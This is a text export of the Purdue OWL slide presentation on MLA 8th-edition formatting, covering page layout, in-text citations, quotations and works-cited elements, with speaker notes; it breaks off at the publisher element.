Welcome to “MLA Formatting and Style Guide“. This Power
Point Presentation is designed to introduce your students to the
basics of MLA Formatting and Style. You might want to
supplement the presentation with more detailed information
available on the OWL’s “MLA Formatting and Style Guide“ at
http://owl.english.purdue.edu/owl/resource/747/01/
Designer: Ethan Sproat
Based on slide designs from the OWL “APA Formatting and
Style Guide “powerpoint by Jennifer Liethen Kunka and Elena
Lawrick.
Contributors: Tony Russell, Alllen Brizee, Jennifer Liethen
Kunka, Joe Barbato, Dave Neyhart, Erin E. Karper, Karl
Stolley, Kristen Seas, Tony Russell, and Elizabeth Angeli.
Revising Author: Arielle McKee, 2014
*
MLA (Modern Language Association) Style formatting is often
used in various humanities disciplines.
In addition to the handbook, MLA also offers The MLA Style
Center, a website that provides additional instruction and
resources for writing and formatting academic papers.
78. https://style.mla.org/
What is MLA?
The MLA Handbook for Writers of Research Papers, 8th ed.
supersedes both the 7th edition handbook and the MLA Style
Manual and Guide to Scholarly Publishing, 3rd ed. The style of
documentation outlined in the 8th edition serves the needs of
students who are writing research papers, as well as scholars
who publish professionally. This presentation will mostly focus
on MLA formatting and style concerns that affect writing
research papers.
MLA style is often used in the following disciplines:
humanities, languages, literature, linguistics, philosophy,
communication, religion, and others.
MLA format provides writers with a uniform format for
document layout and documenting sources. Proper MLA style
shows that writers are conscientious of the standards of writing
in their respective disciplines. Properly documenting sources
also ensures that an author is not plagiarizing.
*
MLA regulates:
document formatin-text citationsworks-cited list
What does MLA regulate?
This slide presents three basic areas regulated by MLA students
need to be aware of—document format, in-text citations, and
79. works cited. The following slides provide detailed explanations
regarding each area.
*
The 8th edition handbook introduces a new way to cite sources.
Instead of a long list of rules, MLA guidelines are now based on
a set of principles that may be used to cite any type of source.
The three guiding principles:
Cite simple traits shared by most works.Remember that there is
more than one way to cite the same source.Make your
documentation useful to readers.
MLA Update 2016
Principle 1: In previous versions of the MLA Handbook, an
entry in the works-cited list was based on the source’s
publication format (book, periodical, Web article, etc.). The
issue with that system is that a work in a new type of medium
could not be properly cited until MLA created a format for it. In
the current system, sources are documented based on facts that
are common to all types of publications, such as author, title,
and year. Now, in order to cite a source, a writer now must
examine it and document it based on a set of universal
principles (more about that to come).
Principle 2: Two scholars may use the same source differently.
Therefore, a writer who is working on a specialized topic in a
particular field will include documentation information that a
writer who is using the source more generally will not.
Principle 3: As a writer, you document sources so that your
readers may locate them and learn more about your particular
80. argument or essay. Proper citation demonstrates your credibility
by showing that you’ve thoroughly researched your topic. Your
citations must be comprehensive and consistent so that readers
may find the sources consulted and come to their own opinions
on your topic.
*
This presentation will cover:
How to format a paper in MLA style (8th ed.)General
guidelinesFirst page formatSection headings
In-text citationsFormatting quotations
Documenting sources in MLA style (8th ed.)Core elementsList
of works cited
Overview
This PPT will cover the 2016 updates to the 8th edition of the
MLA Handbook: how to format a paper, create in-text citations,
and document sources.
*
Basic rule for any formatting style:
Always
Follow your instructor’s
guidelines
Your Instructor Knows Best
81. Many instructors who require their students to use MLA
formatting and citation style have small exceptions to different
MLA rules. Every bit of instruction and direction given in this
presentation comes with this recommendation: ALWAYS follow
the specific instructions given by your instructor.
*
An MLA Style paper should: Be typed on white 8.5“ x 11“
paper Double-space everything Use 12 pt. Times New Roman
(or similar) font Leave only one space after punctuation Set all
margins to 1 inch on all sides Indent the first line of paragraphs
one half-inch
Format: General Guidelines
The entire document should be double-spaced, including the
heading, block quotations, footnotes/endnotes, and list of works
cited. There should be no extra space between paragraphs.Leave
only one space after periods or other punctuation marks (unless
otherwise instructed by your instructor).Set the margins of your
document to 1 inch on all sidesIndent the first line of
paragraphs one half-inch from the left margin. MLA
recommends that you use the Tab key as opposed to pushing the
Space Bar five times.
*
The first page of an MLA Style paper will:Have no title
pageDouble space everythingList your name, your instructor's
name, the course, and date in the upper left-hand cornerCenter
the paper title (use standard caps but no underlining, italics,
82. quote marks, or bold typeface)Use italics for titles
Formatting the 1st Page
・ Do not make a title page for your paper unless specifically
requested
・ In the upper left-hand corner of the first page, list your name,
your instructor's name, the course, and the date. Again, be sure
to use double-spaced text.
・ Double space again and center the title.
Do not underline, italicize, or place your title in quotation
marks; write the title in Title Case (standard capitalization), not
in all capital letters.
・ Use quotation marks and/or italics when referring to other
works in your title, just as you would in your text: Fear and
Loathing in Las Vegas as Morality Play; Human Weariness in
“After Apple Picking“
・ Double space between the title and the first line of the text.
・ Create a header in the upper right-hand corner that includes
your last name, followed by a space with a page number;
number all pages consecutively with Arabic numerals (1, 2, 3,
4, etc.), one-half inch from the top and flush with the right
margin. (Note: Your instructor or other readers may ask that
you omit last name/page number header on your first page.
Always follow instructor guidelines.)
*
Sample 1st Page
・ Do not make a title page for your paper unless specifically
83. requested
・ In the upper left-hand corner of the first page, list your name,
your instructor's name, the course, and the date. Again, be sure
to use double-spaced text.
・ Double space again and center the title.
Do not underline, italicize, or place your title in quotation
marks; write the title in Title Case (standard capitalization), not
in all capital letters.
・ Use quotation marks and/or italics when referring to other
works in your title, just as you would in your text: Fear and
Loathing in Las Vegas as Morality Play; Human Weariness in
“After Apple Picking“
・ Double space between the title and the first line of the text.
・ Create a header in the upper right-hand corner that includes
your last name, followed by a space with a page number;
number all pages consecutively with Arabic numerals (1, 2, 3,
4, etc.), one-half inch from the top and flush with the right
margin. (Note: Your instructor or other readers may ask that
you omit last name/page number header on your first page.
Always follow instructor guidelines.)
*
An in-text citation is a brief reference in your text that indicates
the source you consulted.
It should direct readers to the entry in your works-cited list for
that source.
It should be unobtrusive: provide the citation information
without interrupting your own text.
In general, the in-text citation will be the author’s last name (or
abbreviated title) with a page number, enclosed in parentheses.
In-Text Citations: the Basics
84. Basic In-Text Citation Rules
The source information in a parenthetical citation should direct
readers to the source’s entry in the works-cited list.
The in-text citation should be placed, if possible, where there is
a natural pause in your text. If the citation refers to a direct
quotation, it should be placed directly following the closing
quotation mark.
Any source information that you provide in-text must
correspond to the source information on the works-cited page.
More specifically, whatever signal word or phrase you provide
to your readers in the text, must be the first thing that appears
on the left-hand margin of the corresponding entry in the works-
cited list (so the author’s last name or the title, usually, with no
punctuation in between)
*
In-text Example:
Corresponding Works Cited Entry:
Wordsworth, William. Lyrical Ballads. Oxford UP, 1967.
Author-Page Style
Wordsworth stated that Romantic poetry was marked by a
“spontaneous overflow of powerful feelings” (263). Romantic
poetry is characterized by the “spontaneous overflow of
powerful feelings” (Wordsworth 263). Wordsworth extensively
explored the role of emotion in the creative process (263).
85. In-Text Citations: Author-Page Style
MLA format follows the author-page method of in-text citation.
This means that the author's last name and the page number(s)
from which the quotation or paraphrase is taken must appear in
the text, and a complete reference should appear in your works-
cited page. The author's name may appear either in the sentence
itself or in parentheses following the quotation or paraphrase,
but the page number(s) should always appear in the parentheses,
not in the text of your sentence.
The both citations in the in-text examples on this slide, (263)
and (Wordsworth 263), tell readers that the information in the
sentence can be located on page 263 of a work by the author,
William Wordsworth. If readers want more information about
this source, they can turn to the works-cited list, where, under
Wordsworth, they would find the information in the
corresponding entry also shown on this slide.
*
Print Source with Author
For the following print source
Burke, Kenneth. Language as Symbolic Action: Essays on Life,
Literature, and Method. U of California P, 1966.
If the essay provides a signal word or phrase—usually the
author’s last name—the citation does not need to also include
that information.
Examples:
86. Humans have been described by Kenneth Burke as “symbol-
using animals” (3).
Humans have been described as “symbol-using animals” (Burke
3).
In-text Citations for Print Sources with Known Author
For print sources like books, magazines, scholarly journal
articles, and newspapers, provide a signal word or phrase
(usually the author’s last name) and a page number. If you
provide the signal word/phrase in the sentence, you do not need
to include it in the parenthetical citation. These examples must
correspond to an entry that begins with Burke, which will be the
first thing that appears on the left-hand margin of an entry in
the works-cited list (as noted in the corresponding entry on this
slide). See comments from previous slide.
*
How to cite a work with no known author:
We see so many global warming hotspots in North America
likely because this region has “more readily accessible climatic
data and more comprehensive programs to monitor and study
environmental change…” (“The Impact of Global Warming” 6).
With Unknown Author
In-text Citations for Print Sources with No Known Author
When a source has no known author, use a shortened title of the
87. work instead of an author name. Place the title in quotation
marks if it's a short work (e.g. articles) or italicize it if it's a
longer work (e.g. plays, books, television shows, entire
websites) and provide a page number.
In this example, since the reader does not know the author of
the article, an abbreviated title of the article appears in the
parenthetical citation which corresponds to the full name of the
article which appears first at the left-hand margin of its
respective entry in the works-cited list. Thus, the writer
includes the title in quotation marks as the signal phrase in the
parenthetical citation in order to lead the reader directly to the
source on the works-cited page. See comments from previous
slide.
*
Corresponding Entry in the List of Works Cited:
“The Impact of Global Warming in North America.” Global
Warming: Early Signs. 1999. Accessed 23 Mar. 2009.
With Unknown Author
And this is how the works-cited listing should look. While this
entry is technically correct, it would help your readers more
readily access the source if you include the URL here (it would
go before the access date).
*
Works with Multiple Editions
In-text example:
Marx and Engels described human history as marked by class
88. struggles (79; ch. 1).
Authors with Same Last Names
In-text example:
Although some medical ethicists claim that cloning will lead to
designer
children (R. Miller 12), others note that the advantages for
medical research outweigh this consideration (A. Miller 46).
Other In-Text Citations 1
In parenthetical citations of a literary work available in multiple
editions, such as a commonly studied novel, it is often helpful
to provide division numbers in addition to page numbers so that
your readers can find your references in any edition of the
work.
Make sure that your in-text citations refer unambiguously to the
entry in your works-cited list. If you are citing from the works
of two different authors with the same last name, include the
author’s first initial in your reference).
*
Work by Multiple Authors
In-text Examples:
Smith et al. argues that tougher gun control is not needed in the
United States (76).
The authors state: “Tighter gun control in the United States
erodes Second Amendment rights” (Smith et al. 76).
A 2016 study suggests that stricter gun control in the United
States will significantly prevent accidental shootings (Strong
and Ellis 23).
89. Other In-Text Citations 2
Citing a Work by Multiple Authors
If the entry in the works-cited list begins with the names of two
authors, include both last names in the in-text citation,
connected by and.
If the source has three or more authors, the entry in the works-
cited list should begin with the first author’s name followed by
et al. The in-text citation should follow suit.
*
Multiple Works by the Same Author
In-text examples:
Lightenor has argued that computers are not useful tools for
small children (“Too Soon” 38), though he has acknowledged
elsewhere that early exposure to computer games does lead to
better small motor skill development in a child's second and
third year (“Hand-Eye Development” 17).
Visual studies, because it is such a new discipline, may be “too
easy” (Elkins, “Visual Studies” 63).
Other In-Text Citations 3
Citing Multiple Works by the Same Author
If you cite more than one work by a particular author, include a
shortened title for the particular work from which you are
quoting to distinguish it from the others. This is illustrated in
the first example on this slide. Additionally, if the author's
name is not mentioned in the sentence, format your citation with
90. the author's name followed by a comma, followed by a
shortened title of the work, followed, when appropriate, by page
numbers. This is illustrated in the second example on this slide.
*
Works in time-based media
In-text example:
Buffy’s promise that “there’s not going to be any incidents like
at my old school” is obviously not one on which she can follow
through (“Buffy” 00:03:16-17).
Works-cited entry:
“Hush.” Buffy the Vampire Slayer, created by Joss Whedon,
performance by Sarah Michelle Gellar, season 4, episode 10,
Mutant Enemy,1999.
Other In-Text Citations 6
For works in time-based media, such as audio and video
recordings, cite the relevant time or range of times. Give the
numbers of the hours, minutes, and seconds as displayed in your
media player, separating the numbers with colons.
*
Sources without page numbers
In-text example:
Disability activism should work toward “creating a habitable
space for all beings” (Garland-Thomson).
91. Corresponding works-cited entry:
Garland-Thomson, Rosemarie. “Habitable Worlds.” Critical
Disability
Studies Symposium. Feb. 2016, Purdue University, Indiana.
Address.
Other In-Text Citations 7
When a source has no page numbers or any other kind of part
number, no number should be given in a parenthetical citation.
Do not count unnumbered paragraphs, pauses, or other parts.
This is an example of how to cite a direct quotation from an oral
address.
*
Short prose quotations
In-text example:
According to Foulkes's study, dreams may express “profound
aspects of personality” (184).
Is it possible that dreams may express “profound aspects of
personality” (Foulkes 184)?
Formatting Short Quotations (in Prose)
Short Quotations
If a prose quotation runs no more than four lines and requires
no special emphasis, put it in quotation marks and incorporate it
into the text.. Provide the author and specific page citation in
the text, and include a complete entry in the works-cited page.
Punctuation marks such as periods, commas, and semicolons
92. should appear after the parenthetical citation. Question marks
and exclamation points should appear within the quotation
marks if they are a part of the quoted passage but after the
parenthetical citation if they are a part of your text.
*
Quoting four or more lines of prose
In-text example:
Nelly Dean treats Heathcliff poorly and dehumanizes him
throughout her narration:
They entirely refused to have it in bed with them, or even
in their room,
and I had no more sense, so, I put it on the landing of the
stairs, hoping
it would be gone on the morrow. By chance, or else
attracted by hearing
his voice, it crept to Mr. Earnshaw's door, and there he
found it on
quitting his chamber. Inquiries were made as to how it
got there; I was
obliged to confess, and in recompense for my cowardice
and inhumanity
was sent out of the house. (Bronte 78)
Formatting Long Quotations (in Prose)
In quotations that are four or more lines of text, start the
quotation on a new line, with the entire quote indented half an
inch from the left margin; maintain double-spacing. Do not
indent the first line an extra amount or add quotation marks not
present in the original. Use a colon to introduce the quotation
(unless your introductory wording does not require
punctuation). Your parenthetical citation should come after the
93. closing punctuation mark. Note: If a new paragraph begins in
the middle of the quotation, indent its first line.
*
Each entry in the list of works cited is made up of core elements
given in a specific order.
The core elements should be listed in the order in which they
appear here. Each element is followed by the punctuation mark
shown here.
Works Cited: The Basics
While earlier editions of the MLA Handbook showed writers
how to create a works-cited entry based on the source’s
publication format (book, periodical, film, etc.), the updated 8th
edition demonstrates that documentation should be created by
consulting the list of core elements. Rather than asking: “how
do I cite a book, DVD, or webpage,” the writer now creates an
entry by looking at the list of core elements– which are facts
common to most works– and assembling them in a specific
order.
94. These changes have been made to reflect the differences in how
we consult works. In the updated model, the writer should ask:
“who is the author?” and “what is the title?”, regardless of the
nature of the source. The following slides will explain each of
the core elements, and how they might differ from one medium
to another.
*
Author.
Begin the entry with the author’s last name, followed by a
comma and the rest of the name, as presented in the work. End
this element with a period.
Examples:
Baron, Naomi S. “Redefining Reading: The Impact of Digital
Communication Media.” PMLA, vol. 128, no. 1, Jan. 2013,
pp.
193-200.
Jacobs, Alan. The Pleasures of Reading in an Age of
Distraction.
Oxford UP, 2011.
Works-cited List: Author
While these examples are in different mediums (the first one is
a periodical, the second is a printed book), they are both
formatted according to the list of key elements. Note: there are
other types of author situations, such as multiple authors,
translators, editors, corporate authors, performers, and
pseudonyms (such as online user names). Refer to the 8th
95. edition handbook or the MLA online Style Center
https://style.mla.org/ for more information.
*
Title of source.
Books and websites should be in italics:
Hollmichel, Stefanie. So Many Books. 2003-13,
somanybooksblog.com.
Linett, Maren Tova. Modernism, Feminism, and Jewishness.
Cambridge
UP, 2007.
Periodicals (journal, magazine, newspaper article), television
episodes, and songs should be in quotation marks:
Beyoncé. “Pretty Hurts.” Beyoncé, Parkwood
Entertainment, 2013,
Goldman, Anne. “Questions of Transport: Reading Primo
Levi Reading
Dante.” The Georgia Review, vol. 64, no. 1, 2010, pp.
69-88.
Works-cited List: Title of Source
The title of the source should follow the author’s name.
Depending upon the type of source, it should be listed in italics
or quotation marks.
*
96. Title of container,
Examples:
Bazin, Patrick. “Toward Metareading.” The Future of the Book,
edited by
Geoffrey Nunberg, U of California P, 1996, pp. 153-68.
Hollmichel, Stefanie. “The Reading Brain: Differences between
Digital
and Print.” So Many Books, 25 Apr. 2013,
“Under the Gun.” Pretty Little Liars, season 4, episode 6, ABC
Family,
Hulu, 16 July 2013.
Works-cited List: Title of Container
Containers are the larger wholes in which the source is located.
For example, if you want to cite a poem that is listed in a
collection of poems, the individual poem is the source, while
the larger collection is the container. The title of the container
is usually italicized and followed by a comma, since the
information that follows next describes the container.
In the first example, “Toward Metareading” is the title of an
essay, and The Future of the Book is the title of the edited
collection in which the essay appears.
The container may also be a website, which contains articles,
postings, and other works.
The container may also be a television series, which is made up
of episodes.
*
97. Other contributors,
Examples:
Chartier, Roger. The Order of Books: Readers, Authors, and
Libraries
in Europe between the Fourteenth and Eighteenth Centuries.
Translated by Lydia G. Cochrane, Stanford UP, 1994.
“Hush.” Buffy the Vampire Slayer, created by Joss Whedon,
performance by Sarah Michelle Gellar, season 4, episode 10,
Mutant Enemy, 1999.
Woolf, Virginia. Jacob’s Room. Annotated and with an
introduction by
Vara Neverow, Harcourt, Inc., 2008.
Works-cited List: Other Contributors
In addition to the author, there may be other contributors to the
source who should be credited, such as editors, illustrators,
performers, translators, etc. If their contributions are relevant to
your research, or necessary to identify the source, include their
names in your documentation.
Note: In the eighth edition, terms like editor, illustrator,
translator, etc., are no longer abbreviated.
*
Publisher,
The publisher produces or distributes the source to the public. If